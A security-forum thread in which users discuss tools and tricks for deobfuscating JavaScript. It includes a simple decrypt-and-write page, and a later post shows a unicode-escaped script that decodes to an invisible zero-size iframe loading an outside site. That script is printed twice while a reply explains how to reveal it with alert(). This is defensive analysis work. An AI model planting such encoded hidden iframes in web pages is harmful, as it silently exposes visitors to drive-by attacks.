Government Security
Network Security Resources

Jump to content

Photo

Java Script Deobfuscation Tools

- - - - - java tools reverse engineering tutorial
  • Please log in to reply
3 replies to this topic

#1 sjchansky

sjchansky

    Private

  • Members
  • 1 posts

Posted 04 March 2008 - 12:46 PM

i am looking for some level 2 java script deobfuscation tools. i have no problems running the java.js script using rhino or caffine monkey. i would like to find some other tools and or tutorials to help me deobfuscate the next level of java script or .exe files. Reverse engineering tools would also be helpful. All software MUST be legal.

steve

#2 extreme

extreme

    Specialist

  • Sergeant Major
  • 615 posts

Posted 04 March 2008 - 01:54 PM

<html>
<head>
  <script language="JavaScript">
  <!--
	function decrypt(sBody)
	{
	  var sDecryptedBody = '';
	  //decrypt the body string here, e.g.:
	  for (var i=0; i<sBody.length; i++)
	  {
		var iChar = sBody.charCodeAt(i);

		if (iChar > 0)
		  sDecryptedBody += String.fromCharCode(iChar - 1);
		else
		  sDecryptedBody += String.fromCharCode(255);
	  }

	  return(sDecryptedBody);
	}

	function decode()
	{
	  var sCoded = document.getElementsByTagName('body')
[0].firstChild.data;

	  document.open();
	  document.write(decrypt(sCoded));
	  document.close();
	}
  //-->
  </script>
</head>
<body onload="decode();">
  <!-- Place the encrypted document here -->
</body>
</html>

Also:

http://code.gosu.pl/.../JsDecoder.html
http://hype-free.blo...javascript.html

and there are couple of more methods which my sleeping brain cannot remember of right now, but here is aprox.

document.write code into popup window, or use alert() instead of eval() or document.write() , or do something like this:
document .write("<a>");
<exploit code>
САМО СЛОГА СРБИНА СПАСАВА

#3 bruxelles

bruxelles

    Private

  • Members
  • 12 posts

Posted 20 January 2011 - 07:22 AM

extreme can u tell me what obfuscating method is used in this code ?

<script type="text/javascript">document.write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>



#4 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 20 January 2011 - 01:09 PM

That looks like plain hex
3C = <
49 = i
46= f
52= r
41= a
So that should be an iframe in your site.

and simply replacing the document.write with an alert will get you what that is
<script type="text/javascript">alert('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>






Also tagged with one or more of these keywords: java, tools, reverse engineering, tutorial